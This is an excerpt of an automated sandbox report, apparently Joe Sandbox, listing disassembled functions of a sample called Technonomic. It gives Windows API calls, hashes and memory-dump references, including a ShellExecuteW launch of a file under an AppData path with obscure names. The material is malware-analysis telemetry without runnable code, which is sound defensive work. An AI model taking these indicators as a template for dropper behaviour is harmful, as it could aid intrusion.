Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
Instruction ID: 29bb6eb7f5aafbc6e445c06f8dac873239588b1e002d851f56b7f63b732aee86
Opcode Fuzzy Hash: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
Instruction Fuzzy Hash: A9A14471D00229CBDB28CFA8C844BADBBB1FF44305F21856ED856BB281D7785A86CF44

Function 00406E7D Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
Instruction ID: e1a0b165b1ec2cfc9f877bfb9dcbf2309f9cd93107b4533ef6724984480a2cde
Opcode Fuzzy Hash: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
Instruction Fuzzy Hash: 2A913370D00229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB281C779A986DF45

Function 00406B93 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cabeb7f0ac32f2dbf9dc68cead907101fe434422346ba396ff6a4e1791945c5
Instruction ID: 37e0958252648d02cff52253bcfdfe32609a82ce416cf41b7e12165f3d842d3a
Opcode Fuzzy Hash: 4cabeb7f0ac32f2dbf9dc68cead907101fe434422346ba396ff6a4e1791945c5
Instruction Fuzzy Hash: 3A814571D04228CFDF24CFA8C944BADBBB1FB44305F25816AD456BB281C7789A96CF45

Function 00406698 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55e986299dffb9fb67cabe2458bae2281fa53825949e9f46481d15298381b70
Instruction ID: badab6c45d1579aebeb642038854a5de2f2e9fe133ee6b5741b25705484aa732
Opcode Fuzzy Hash: f55e986299dffb9fb67cabe2458bae2281fa53825949e9f46481d15298381b70
Instruction Fuzzy Hash: 9A816731D04228DBDF24CFA8C844BADBBB0FF44305F21856AD856BB281D7796A86DF45

Function 00406AE6 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f41dab0dbba64a540d9551cbe01a5d5f92f5b5317ed5009a96d4fab12e5207c8
Instruction ID: 661ade8e8f79e5a6005bf83598ee02ccf2e60dcd73e05bd09c6951c965a298a8
Opcode Fuzzy Hash: f41dab0dbba64a540d9551cbe01a5d5f92f5b5317ed5009a96d4fab12e5207c8
Instruction Fuzzy Hash: DC713471D00228CFDF24CFA8C944BADBBB1FB48305F25816AD846B7281D7799A96DF44

Function 00406C04 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
Instruction ID: d698c6254bb21e10e407083827577a24b67810c044b8fa2104370265796c5121
Opcode Fuzzy Hash: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
Instruction Fuzzy Hash: C3714571D04228CFDF28CFA8C844BADBBB1FB48305F25816AD856B7281C7785956DF45

Function 00406B50 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
Instruction ID: 46d523a662c7919231ebab16691ba05348c69527c8d8aa00e9837d4009f14a99
Opcode Fuzzy Hash: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
Instruction Fuzzy Hash: 28714571D00228DBDF28CF98C944BADBBB1FF44305F21816AD856BB281C778AA56DF44

Function 004031EF Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403203

Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 00403236
SetFilePointer.KERNELBASE(00A434AA,00000000,00000000,00414EF0,00004000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000), ref: 00403331

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
Instruction ID: 2f989109dca0f14896005150ea4b142ee5491df85de4bcb3d025a191183ef828
Opcode Fuzzy Hash: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
Instruction Fuzzy Hash: 6F317A72500215DFCB109F69EEC496A3BAAF74475A714423FE900B22E0CB799D05DB9D

Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 8fcd44a165ceb9b3c7ca3aadaa3b6318a37a053de054dbdc544eae6363f814e6
Instruction ID: be163213bf01efc0596bf906ca0f1611b6abe1a57da7fca01b5cdd0d3cce8cbe
Opcode Fuzzy Hash: 8fcd44a165ceb9b3c7ca3aadaa3b6318a37a053de054dbdc544eae6363f814e6
Instruction Fuzzy Hash: 4921C631900219EBCF20AFA5CE48A9E7E71BF00354F60427BF501B51E1CBBD8A81DA5E

Function 004021EA Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004064C6: FindFirstFileW.KERNELBASE(76F93420,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405994,?,76F93420,76F92EE0), ref: 004064D1
Part of subcall function 004064C6: FindClose.KERNEL32(00000000), ref: 004064DD

lstrlenW.KERNEL32 ref: 0040222A
lstrlenW.KERNEL32(00000000), ref: 00402235
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 0040225E

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: f0a18f43b2fd03918ce55f1a207086b2750e482e6a70c5afb59815244b6eb2cd
Instruction ID: c84e55253e39239becd36fe695d6eaeea1e53b9ed95ff09ccc99126e74603a36
Opcode Fuzzy Hash: f0a18f43b2fd03918ce55f1a207086b2750e482e6a70c5afb59815244b6eb2cd
Instruction Fuzzy Hash: C011707190031896CB10EFF98E4999EB7B8AF14314F10847FA905FB2D9D6B8D9418B59

Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 6484ca5ed5e76b4549c4ba381c39e577598ee1135ee5e1483c34ecd9ae314918
Instruction ID: f7d1df95d760c65b2fa1112c316253173fa515e4752bf04adbc10342b079e70f
Opcode Fuzzy Hash: 6484ca5ed5e76b4549c4ba381c39e577598ee1135ee5e1483c34ecd9ae314918
Instruction Fuzzy Hash: 12F08171A00204EBEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69

Function 00401E08 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable,?), ref: 00401E52

Strings

C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable, xrefs: 00401E3B

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable
API String ID: 587946157-550679374
Opcode ID: abdb6d04a8628e8e10e6f0e4e307bd878a3efa8eec47d48165f605e3d5e5f129
Instruction ID: 6f03a3129deb64bde54e8dcd59ef9069cb9fc2feb89592f518e75193bcf3d7b7
Opcode Fuzzy Hash: abdb6d04a8628e8e10e6f0e4e307bd878a3efa8eec47d48165f605e3d5e5f129
Instruction Fuzzy Hash: ACF0C236B00100AACB11AFB99E4AEAD33B9AB44724B240577F901F74D5DAFC89419618

Function 004030E7 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 0040310C

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
Instruction ID: 67d9160ce0aa1e2e76d61ceadf7dfe4382c4b6927c35e4cb0672809be5a1f01d
Opcode Fuzzy Hash: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
Instruction Fuzzy Hash: 2D316D30200219EBDB109F55DD84ADA3E68EB08359B10843BF905EA1D0D779DF50DBA9

Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
